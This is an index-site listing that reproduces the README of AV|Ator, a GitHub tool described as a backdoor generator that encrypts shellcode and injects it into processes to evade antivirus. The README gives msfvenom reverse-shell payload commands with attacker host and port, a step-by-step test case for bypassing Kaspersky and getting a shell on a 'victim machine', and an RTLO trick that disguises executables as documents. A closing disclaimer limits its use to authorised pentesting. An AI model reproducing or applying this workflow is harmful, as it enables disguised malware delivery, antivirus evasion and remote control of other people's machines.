Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ch0pin/aviator
Antivirus evasion project
https://github.com/ch0pin/aviator
antivirus antivirus-testing av-b av-evasion backdoor backdooring backdoors bypass crypter injection shellcode trojan virus virus-total windows
Last synced: 13 days ago
JSON representation
Antivirus evasion project
- Host: GitHub
- URL: https://github.com/ch0pin/aviator
- Owner: Ch0pin
- License: gpl-3.0
- Created: 2018-04-14T06:29:05.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2022-05-23T11:49:13.000Z (over 2 years ago)
- Last Synced: 2024-10-14T11:01:13.726Z (29 days ago)
- Topics: antivirus, antivirus-testing, av-b, av-evasion, backdoor, backdooring, backdoors, bypass, crypter, injection, shellcode, trojan, virus, virus-total, windows
- Language: C#
- Homepage:
- Size: 3.12 MB
- Stars: 1,045
- Watchers: 36
- Forks: 224
- Open Issues: 9
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
AviAtor Ported to NETCore 5 with an updated UI
# AV|Ator
**About**://name
***AV**: AntiVirus*
***Ator**: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air* (https://en.wikipedia.org/wiki/Ator)
#
**About**://purpose
**AV|Ator** is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:
- It uses AES encryption in order to encrypt a given shellcode
- Generates an executable file which contains the encrypted payload
- The shellcode is decrypted and injected to the target system using various injection techniques[https://attack.mitre.org/techniques/T1055/]:
1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.
2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
### Usage
The application has a form which consists of three main inputs (See screenshot bellow):
![Screenshot 2019-04-29 at 11 41 21](https://user-images.githubusercontent.com/4659186/56884876-bca19480-6a73-11e9-8bbf-d249c4813e4e.png)
1. A text containing the encryption key used to encrypt the shellcode
2. A text containing the IV used for AES encryption
3. A text containing the shellcodeImportant note: The shellcode should be provided as a C# byte array.
The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.
### RTLO option
In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc.
E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"Beware of the fact that some AVs alert the spoof by its own as a malware.
### Set custom icon
I guess you all know what it is :)
### Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell in a windows 10 machine running fully updated kaspersky AV
#### Target Machine: Windows 10 x64
1. Create the payload using msfvenom
```msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp```
2. Use AVIator with the following settings
Target OS architecture: x64
Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)
Target procedure: explorer (leave the default)
3. Set the listener on the attacker machine
4. Run the generated exe on the victim machine
### Installation
**Windows:**
Either compile the project or download the allready compiled executable from the following folder:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
**Linux:**
Install Mono according to your linux distribution, download and run the binaries
e.g. in kali:
```
root@kali# apt install mono-devel
root@kali# mono aviator.exe
```### Credits
To Damon Mohammadbagher for the encryption procedure### Disclaimer
I developed this app in order to overcome the demanding challenges of the pentest process and this is the **ONLY WAY** that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.